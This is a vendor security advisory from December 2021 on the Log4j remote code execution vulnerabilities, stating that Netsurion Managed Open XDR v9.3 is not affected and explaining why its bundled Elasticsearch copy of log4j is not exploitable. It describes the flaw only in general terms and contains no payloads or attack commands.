Security Advisory: Log4j Vulnerabilities

Updated: Dec 18, 2021

Summary

On Dec. 9, 2021, a remote code execution (RCE) vulnerability CVE-2021-44228 in Apache log4j 2 was identified, and attackers are already actively exploiting this vulnerability. On Dec. 14, 2021, a second vulnerability CVE-2021-45046 was announced and fixed in log4j v2.16.0 and v2.12.2. A third vulnerability CVE-2021-450105 was announced and fixed in log4j v2.17.0.

Netsurion Managed Open XDR v9 core code does not use the Apache log4j library. Our analysis shows no components of Netsurion Managed Open XDR v9.3 are affected by this vulnerability. 

Note: Netsurion Managed Open XDR v9.3 incorporates ElasticSearch v7.2.1. A scan of the installation will show Program Files\Elasticsearch-7.2.1\lib\log4j-core-2.11.1.jar, which may be considered vulnerable. However, this is not exploitable and does not require urgent remediation.

• Elastic confirms in this announcement which says “Elasticsearch 6 and 7 are not susceptible to remote code execution with this vulnerability due to our use of the Java Security Manager”
• The implementation of Elasticsearch is bound to localhost (127.0.0.1) only and is not directly accessible from another machine
• We have tested and confirmed the above statement from Elastic

More information:
https://logging.apache.org/log4j/2.x/security.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
https://nvd.nist.gov/vuln/detail/CVE-2021-45105

Background

Apache log4j 2 is an open-source Java-based logging framework that is leveraged within numerous Java applications. The Apache log4j library allows for developers to log various data within their application. In certain circumstances, the data being logged originates from user input. Should this user input contain special characters and be subsequently logged within the context of log4j, the Java method lookup will finally be called to execute the user-defined remote Java class in the Lightweight Directory Access Protocol (LDAP) server. This will in turn lead to RCE on the victim’s server that uses the vulnerable log4j 2 instance.

Public Proof of Concept (PoC) code was released, and subsequent investigation revealed that exploitation was easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct the system to download and execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems.

Affected version

Apache Log4j 2.x <= 2.15.0-rc1

Available updates

Apache has released 2.17.0 (for Java8 and up) which address CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.

Conclusion

The CVE-2021-44228 vulnerability is still being actively investigated in order to properly identify the full scope severity. Given the information currently available, this vulnerability may have a high impact at present and in the near future. Most of the applications affected are widely used in corporate networks. Users are encouraged to take all necessary steps to ensure they are protected against this vulnerability.